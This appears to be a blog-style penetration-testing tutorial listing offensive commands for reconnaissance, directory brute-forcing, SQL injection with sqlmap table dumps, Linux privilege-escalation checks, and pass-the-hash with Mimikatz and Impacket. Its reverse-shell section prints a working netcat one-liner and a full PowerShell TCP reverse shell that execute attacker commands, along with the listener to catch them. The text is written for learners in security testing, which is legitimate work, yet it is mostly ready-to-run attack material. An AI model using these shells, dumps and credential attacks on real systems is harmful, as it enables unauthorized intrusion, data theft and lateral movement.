Listen to this Post
Introduction:
The landscape of cybersecurity is a perpetual arms race, where offensive security professionals leverage sophisticated techniques to uncover vulnerabilities before malicious actors can exploit them. Mastering the core tools and commands is the foundational step in building a successful career in penetration testing and bug bounty hunting. This guide provides a tactical walkthrough of essential commands across multiple domains, from reconnaissance to post-exploitation.
Learning Objectives:
- Execute a comprehensive reconnaissance and enumeration strategy against target networks and web applications.
- Identify and exploit common vulnerabilities in web applications and network services.
- Establish and leverage footholds on compromised systems for lateral movement and data exfiltration.
You Should Know:
1. Network Reconnaissance with Nmap
Nmap is the undisputed king of network discovery and security auditing. It is used to discover hosts and services on a computer network by sending packets and analyzing the responses.
nmap -sC -sV -O -p- 192.168.1.100 nmap --script vuln 10.10.10.0/24 nmap -sU -p 53,67,68,161 192.168.1.1
Step-by-step guide:
-sC: Runs a default set of common scripts to gather further information.-sV: Probes open ports to determine service and version information.-O: Enables OS detection based on TCP/IP stack fingerprinting.
4. `-p-`: Scans all 65,535 TCP ports.
- The `vuln` script category automates the checking for known vulnerabilities.
6. `-sU` initiates a UDP scan for services that do not use TCP.
2. Web Application Directory Bruteforcing with Gobuster
Gobuster is a tool used to brute-force URIs (directories and files) on web servers and DNS subdomains.
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt gobuster dns -d example.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
Step-by-step guide:
1. `dir` mode is for directory and file enumeration.
2. `-u`: Specifies the target URL.
-w: Specifies the wordlist to use for brute-forcing.
4. `dns` mode is used for subdomain enumeration.
5. `-d`: Specifies the target domain.
3. Vulnerability Scanning with Nikto
Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items.
nikto -h http://example.com -p 80,443 -Tuning 1,2,3,4,5,6,7,8,9,0,a,b,c
Step-by-step guide:
1. `-h`: Defines the target host.
2. `-p`: Specifies the ports to scan.
-Tuning: Controls the scan plugins used. The numbers and letters represent different categories of checks (e.g., File Uploads, SQLi, XSS).
4. Exploiting SQL Injection with SQLmap
SQLmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws.
sqlmap -u "http://example.com/page.php?id=1" --dbs --batch sqlmap -u "http://example.com/page.php?id=1" -D acmedb --tables sqlmap -u "http://example.com/page.php?id=1" -D acmedb -T users --dump
Step-by-step guide:
1. `-u`: Specifies the vulnerable URL.
2. `–dbs`: Enumerates the available databases.
--batch: Runs the tool without requiring user input, using default behaviors.
4. `-D` and `-T` specify the database and table to target.
5. `–dump` retrieves and displays all the contents of the specified table.
5. Establishing a Reverse Shell
A reverse shell is a crucial technique where the target machine initiates a connection back to the attacker’s machine.
Linux (Netcat):
nc -e /bin/sh 10.0.0.1 4444
Windows (PowerShell):
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Step-by-step guide:
- The attacker first sets up a listener on their machine:
nc -nlvp 4444. - The Linux command, when executed on the target, uses Netcat (
nc) to send a shell (/bin/sh) back to the attacker’s IP and port. - The complex PowerShell command creates a TCP client, connects back to the attacker, and pipes any received commands to the PowerShell interpreter (
iex), sending the output back.
6. Privilege Escalation on Linux
After gaining a foothold, the next step is often to escalate privileges to the root user.
find / -perm -u=s -type f 2>/dev/null sudo -l cat /etc/crontab uname -a
Step-by-step guide:
- The `find` command locates all SUID binaries, which are executed with the permissions of their owner (often root).
2. `sudo -l` lists the commands the current user is allowed to run with elevated sudo privileges. - Checking `/etc/crontab` reveals scheduled jobs that might run with higher privileges.
4. `uname -a` displays the kernel version, which can be checked against known exploitation scripts.
7. Lateral Movement with Pass-the-Hash on Windows
Pass-the-Hash is an attack technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user’s password.
Using Mimikatz:
privilege::debug sekurlsa::pth /user:Administrator /domain:WORKGROUP /ntlm:<NTLM_Hash>
Using Impacket’s psexec:
psexec.py -hashes :<NTLM_Hash> [email protected]
Step-by-step guide:
- First, the attacker must dump the password hashes from memory or a local database (e.g., SAM file) using a tool like Mimikatz.
2. In Mimikatz, `privilege::debug` obtains the necessary privileges.
3. `sekurlsa::pth` performs the Pass-the-Hash attack, creating a new process with the stolen credentials.
4. Impacket’s `psexec.py` uses the hash directly to gain a remote shell on the target machine.
What Undercode Say:
- The barrier to entry for offensive security is lowering, not due to simpler tools, but because of the powerful automation and knowledge consolidation they provide.
- True expertise lies not in running the commands, but in interpreting their output, understanding the context of the target environment, and chaining subtle findings into a critical breach.
The proliferation of open-source security tools has democratized penetration testing, allowing newcomers to achieve significant results quickly. However, this creates a dual-edged sword. While it enables more defenders to find and fix flaws, it also lowers the threshold for less-skilled attackers. The future of security will not be won by those who simply run a scanner, but by those who possess the deep analytical skills to understand the “why” behind a vulnerability and can craft novel attacks that evade automated detection. The tools are the brush, but the hacker is the artist.
Prediction:
The increasing automation of both attack and defense will lead to a paradigm shift in cybersecurity. AI-driven offensive tools will soon be able to chain vulnerabilities autonomously, moving from initial reconnaissance to full domain compromise with minimal human intervention. This will force a corresponding evolution in defensive AI, leading to a new era of autonomous cyber warfare where the speed and complexity of attacks will far outpace human-only response times. The role of the human security professional will evolve to become a strategist and overseer of these AI systems.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Arjun Singh – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
